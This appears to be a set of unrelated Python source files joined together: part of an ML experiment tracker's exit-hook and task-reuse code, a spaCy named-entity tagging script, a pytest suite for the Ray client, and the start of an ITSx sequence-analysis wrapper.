sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
if not self._org_handlers and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for s in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[s] = signal.getsignal(s)
signal.signal(s, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id],
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [
cls(private=cls.__create_protection, task_id=task, log_to_backend=False)
for task in task_ids
]
return cls._query_tasks(
project_name=project_name,
task_name=task_name,
**kwargs
)
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else None,
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may no longer exist (e.g. the environment changed)
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out, i.e. it was last used within the previous 24 hours.
2. Its name, project, and type match the data in the server, so as not
to override user changes made through the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True if the task is relevant for reuse, False if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
ner_with_spacy.py
|
import spacy
import sys
from os import listdir, system
from os.path import isfile, join
from multiprocessing import Process
from math import ceil
import subprocess
indir_path = sys.argv[1]
outdir_path = sys.argv[2]
nthreads = int(sys.argv[3])
def process(filenames, tid):
nlp = spacy.load('en')
for fname in filenames:
in_path = fname
out_path = outdir_path + '/' + fname.split('/')[-1] + '.ner'
print('tagging', fname, 'and write to', out_path)
cmd = r"""awk '{if (NF > 2) printf("%s ", $2); else printf("\n")}' """ + fname + r' > /tmp/spacy' + str(tid)
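# (descriptive note) the awk one-liner above extracts the token column (field 2) from the
# CoNLL-style input, printing tokens separated by spaces and starting a new output line
# whenever an input line has two or fewer fields (i.e. a sentence boundary); the result is
# written to a per-thread temp file that spaCy then tags.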
print(cmd)
system(cmd)
ner(nlp, '/tmp/spacy' + str(tid), out_path)
print('done', fname)
def ner(nlp, in_path, out_path):
with open(out_path, 'w') as fout:
with open(in_path, 'r') as fin:
count = 0
for line in fin:
line = line.strip().replace('-LRB-', '(').replace('-RRB-', ')')
if line.startswith('- DOC'):
fout.write(line.replace('- DOCSTART', '-DOCSTART- (') + ')\n')
continue
doc = nlp(line)
start = 0
string = str(doc)
for ent in doc.ents:
if ent.label_ not in {'PERSON', 'NORP', 'FACILITY', 'ORG', 'GPE', 'LOC', 'PRODUCT', 'WORK_OF_ART', 'EVENT', 'LAW', 'LANGUAGE'}:
continue
output = string[start:ent.start_char].strip()
if len(output) > 0:
fout.write(output.replace(' ', '\n') + '\n')
ent_name = string[ent.start_char:ent.end_char].strip()
toks = ent_name.split()
if len(toks) == 0:
continue
if toks[0] == 'the' or toks[0] == 'The':
fout.write(toks[0] + '\n')
toks = toks[1:]
if len(toks) == 0:
continue
print_s = False
if toks[-1] == "'s":
print_s = True
toks = toks[:-1]
ent_name = ' '.join(toks)
if len(ent_name) == 0:
continue
# print(ent, ent.label_, ent.start_char, ent.end_char)
fout.write(toks[0] + '\tB\t' + ent_name + '\tUNK\tUNK\tUNK\tUNK\n')
for i in range(1,len(toks)):
fout.write(toks[i] + '\tI\t' + ent_name + '\tUNK\tUNK\tUNK\tUNK\n')
if print_s:
fout.write("'s\n")
start = ent.end_char
output = string[start:].strip()
if len(output) > 0:
fout.write(output.replace(' ', '\n') + '\n')
fout.write('\n')
# count += 1
# if count % 100 == 0:
# print(count, end='\r')
# if count > 1000:
# break
if __name__ == "__main__":
filelist = [join(indir_path, f) for f in listdir(indir_path) if isfile(join(indir_path, f))]
split = []
step = ceil(len(filelist) / nthreads)
for i in range(nthreads):
split.append(filelist[i * step : min(len(filelist), (i + 1) * step)])
for i, fl in enumerate(split):
p = Process(target=process, args=(fl,i))
p.start()
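# Suggested sketch (not in the original script): the worker processes above are started but
# never joined, so the parent simply exits and relies on the non-daemonic children to finish.
# Collecting and joining them would make completion explicit:
#
#     procs = []
#     for i, fl in enumerate(split):
#         p = Process(target=process, args=(fl, i))
#         p.start()
#         procs.append(p)
#     for p in procs:
#         p.join()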
|
test_client.py
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import numpy as np
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get() is False, "Threaded disable_client_hook failed to disable"
assert q.get() is True, "Threaded disable_client_hook failed to re-enable"
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
def test_get_list(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def f():
return "OK"
assert ray.get([]) == []
assert ray.get([f.remote()]) == ["OK"]
get_count = 0
get_stub = ray.worker.server.GetObject
# ray.get() uses unary-unary RPC. Mock the server handler to count
# the number of requests received.
def get(req, metadata=None):
nonlocal get_count
get_count += 1
return get_stub(req, metadata=metadata)
ray.worker.server.GetObject = get
refs = [f.remote() for _ in range(100)]
assert ray.get(refs) == ["OK" for _ in range(100)]
# Only 1 RPC should be sent.
assert get_count == 1
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or (
ready,
remaining,
) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) or (
ready_retval,
remaining_retval,
) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
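# Illustrative sketch (assumed test-style usage, mirroring the wait semantics exercised
# above): num_returns controls how many refs must be ready before ray.wait returns, and
# sorting the results avoids relying on the ready-list ordering.
#
#     refs = [plus2.remote(i) for i in range(4)]
#     ready, not_ready = ray.wait(refs, num_returns=4, timeout=30)
#     assert sorted(ray.get(ready)) == [2, 3, 4, 5]
#     assert not_ready == []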
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact, 10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(
actor_handle.exec_exec.remote(second_actor, fact, 9)
) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj, 4)) == local_fact(4)
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propagate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any((msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any((msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(TypeError):
@ray.remote(runtime_env="invalid value")
def f():
return 1
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor."""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detached_actor = ray.get_actor("test_acc2")
for _ in range(5):
detached_actor.inc.remote()
assert ray.get(detached_actor.get.remote()) == 6
h1, h2 = ray.get(detached_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server,))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert (
str(e.value) == "Ray Client is not connected."
" Please connect by calling `ray.init`."
)
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
# Checks no error output when running the script in
# object_ref_cleanup_script
# See https://github.com/ray-project/ray/issues/17968 for details
with ray_start_client_server():
result = run_string_as_driver(object_ref_cleanup_script)
assert "Error in sys.excepthook:" not in result
assert "AttributeError: 'NoneType' object has no " not in result
assert "Exception ignored in" not in result
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25552 --port 0"],
indirect=True,
)
def test_wrapped_actor_creation(call_ray_start):
"""
When the client schedules an actor, the server will load a separate
copy of the actor class if it's defined in a separate file. This
means that modifications to the client's copy of the actor class
aren't propagated to the server. Currently, tracing logic modifies
the signatures of actor methods to pass around metadata when ray.remote
is applied to an actor class. However, if a user does something like:
class SomeActor:
def __init__(self):
pass
def decorate_actor():
RemoteActor = ray.remote(SomeActor)
...
Then the SomeActor class will have its signatures modified on the client
side, but not on the server side, since ray.remote was applied inside of
the function instead of directly on the actor. Note if it were directly
applied to the actor then the signature would be modified when the server
imports the class.
"""
import ray
ray.init("ray://localhost:25552")
run_wrapped_actor_creation()
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
indirect=True,
)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
import ray
if use_client:
address = call_ray_start
ray.init(address)
else:
ray.init("ray://localhost:25553")
@ray.remote(num_cpus=0)
def f():
pass
ray.get(f.remote())
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 1"],
indirect=True,
)
def test_object_ref_release(call_ray_start):
import ray
ray.init("ray://localhost:25553")
a = ray.put("Hello")
ray.shutdown()
ray.init("ray://localhost:25553")
del a
with disable_client_hook():
ref_cnt = ray.util.client.ray.get_context().client_worker.reference_count
assert all(v > 0 for v in ref_cnt.values())
def test_empty_objects(ray_start_regular_shared):
"""
Tests that client works with "empty" objects. Sanity check, since put requests
will fail if the serialized version of an object consists of zero bytes.
"""
objects = [0, b"", "", [], np.array(()), {}, set(), None]
with ray_start_client_server() as ray:
for obj in objects:
ref = ray.put(obj)
if isinstance(obj, np.ndarray):
assert np.array_equal(ray.get(ref), obj)
else:
assert ray.get(ref) == obj
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
its.py
|
#!/usr/bin/env python
from threading import Thread
from accessoryFunctions import *
from itsx.parallel import ITSx
import os
__author__ = 'mike knowles'
class ITS(object):
def __init__(self, inputobject):
from Queue import Queue
self.metadata = [sample for sample in inputobject.runmetadata.samples
if os.path.isfile(sample.general.bestassemblyfile)]
self.start = inputobject.starttime
self.threads = int(inputobject.cpus)
self.path = inputobject.path
self.smallqueue = Queue()
self.hmm = inputobject.hmm
with open(which("ITSx")) as f:
for line in f:
if line.startswith("$app_version"):
self.version = line.split('=')[1].strip()[1:-2]
break
printtime('Performing ITSx {} analysis'.format(self.version), self.start)
for _ in range(len(self.metadata)):
# Send the threads to the run method; args is empty because each worker pulls samples from the queue
threads = Thread(target=self.run, args=())
# Set the daemon to true so the worker threads exit when the main thread does
threads.setDaemon(True)
# Start the threading
threads.start()
for i in self.metadata:
i.general.ITSxresults = '{}/ITSx_results'.format(i.general.outputdirectory)
make_path(i.general.ITSxresults)
self.smallqueue.put(i)
self.smallqueue.join()
@staticmethod
def parse(sample, pos):
sample.ITS = GenObject()
main = lambda k, v: getattr(*k).append(v) if hasattr(*k) else setattr(*k + ([v],))
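# (descriptive note) `main` appends `v` to the attribute addressed by the (object, name)
# pair `k` when that attribute already exists, otherwise it creates it as a new
# one-element list; it is used below to accumulate "contig[range]" strings per ITS region.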
for line in pos:
line = line.strip()
lst = line.split('\t')
contig = lst[0]
for ele in lst[2:]:
if "No" not in ele and ': ' in ele:
k, v = ele.split(": ")
main((sample.ITS, k), "{}[{}]".format(contig, v.replace('-', ':')))
def run(self):
while True:
sample = self.smallqueue.get()
sample.software.ITSx = self.version
positions, summary = [os.path.join(sample.general.ITSxresults, sample.name + f)
for f in ['.positions.txt', '.summary.txt']]
